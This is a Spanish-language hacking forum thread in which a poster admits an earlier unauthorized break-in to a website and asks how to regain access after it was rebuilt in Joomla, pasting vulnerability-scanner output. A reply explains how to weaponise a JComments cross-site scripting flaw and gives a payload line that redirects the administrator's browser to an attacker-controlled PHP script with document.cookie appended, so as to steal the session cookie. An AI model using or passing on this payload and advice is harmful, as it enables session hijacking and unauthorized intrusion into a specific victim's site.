Cómo utilizar un exploit para Joomla

Iniciado por Dostoyevski, 30 Septiembre 2012, 14:37 PM

0 Miembros y 1 Visitante están viendo este tema.

Dostoyevski

Hola a todos.
No estoy completamente seguro de si este es el lugar para la consulta, en caso de que no sea así pido disculpas y que los moderadores la coloquen en el sitio oportuno.

Desde hace varios meses estoy intentando entrar en una web. En su momento lo hice con una facilidad asombrosa porque estaba diseñada con php-nuke. Llegué a tener control de su ftp, mysql y, obviamente, el admin de nuke.  No hice ninguna destroza ni nada por el estilo porque no era mi intención. Tan sólo buscaba datos que en aquel momento me interesaban y cambié alguna cosilla (esto último fue una estupidez que podía haberme ahorrado).

Al poco, y por culpa de lo anterior, se dieron cuenta y, claro, cambiaron contraseñas y construyeron de nuevo su web con joomla.

Ahora llevo, como he dicho, mucho tiempo intentando encontrar como entrar otra vez. Utilizando el Joomlascan he visto que tienen algunas vulnerabilidades, pero no sé muy bien como usar los exploits ni como sacarles provecho.

El resultado de Joomlascan es este:

http://imageshack.us/a/img341/5973/loares.jpg

Estos son algunas de las vulnerabilidades:

Citar

Possible vulnerabilities in Core (4)  
Vulnerabilities showed are in the same range that detected Joomla! version


Info: Administration Pages Multiple HTML Injection Vulnerabilities (Core)  
Versions affected: Joomla! [1.5.0-1.5.19]
Exploit: Joomla! is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data.Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

More info: http://www.securityfocus.com/bid/41822/

--------------------------------------------------------------------------------

Info: Predictable Password Generation And Information Disclosure Vulnerabilities (Core)  
Versions affected: Joomla! [1.5.9-1.5.22]  
Exploit: Joomla! Predictable Password Generation And Information Disclosure Vulnerabilities

More info: http://www.securityfocus.com/bid/52750/

--------------------------------------------------------------------------------

Info: Unspecified Information Disclosure Vulnerabilities (Core)  
Versions affected: Joomla! [1.5.0-1.5.23]  
Exploit: Joomla! Unspecified Information Disclosure Vulnerabilities

More info: http://www.securityfocus.com/bid/50188/

--------------------------------------------------------------------------------

Info: Password Enumeration Weakness and Cross Site Scripting Vulnerability (Core)  
Versions affected: Joomla! [1.5.0-1.5.24]  
Exploit: Joomla! Password Enumeration Weakness and Cross Site Scripting Vulnerability

More info: http://www.securityfocus.com/bid/50664/


Y esta es la que creo que puedo utilizar con mayor probabilidad de éxito, aunque no sabría explirar muy bien porqué. Pero no consigo averiguar como se utiliza el exploit.

Citar

Info: JoomlaTune JComments Joomla! Component 'ComntrNam' Parameter Cross-Site Scripting Vulnerability (Component - com_jcomments)  
Versions affected: JoomlaTune JComments 2.1

Exploit: The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

More info: http://www.securityfocus.com/bid/40230/


Podríais ayudarme, por favor.

PD: Por supuesto me hago cargo que ya os habréis dado cuenta de que soy un completo principiante. Espero seguir aprendiendo poco a poco con el tiempo.

Dostoyevski

De verdad nadie puede echarme una mano?

ameise_1987

el que dices que deberias usar, es un xss que se envia a travez del metodo post ya que es un formulario, ahi te indica que es un poc y cuando el administrador lo ejecute le saldra una ventana con un mensaje, ahora ese mensaje si lo quieres utilizar lo debes cambiar para realizar el robo de la cookie de la sesion del administrador.

esta parte debes cambiar :
alert(document.cookie)

por algo como
window.location='http://tuhostquealmacenaralacookie.com.ar/robo_cookie.php'+document.cookie

con esto el administrador estaria enviando la cookie a tu host y esta seria captada por el PHP, ahora te digo que este seria el ataque mas basico y el mas cantoso asi que a ingeniarselas.

tambien debes cambiar la ruta de la web del administrador "http://joomla/administrator/index.php".
firma retirada por insultar/cachondearse de (anelkaos) del staff.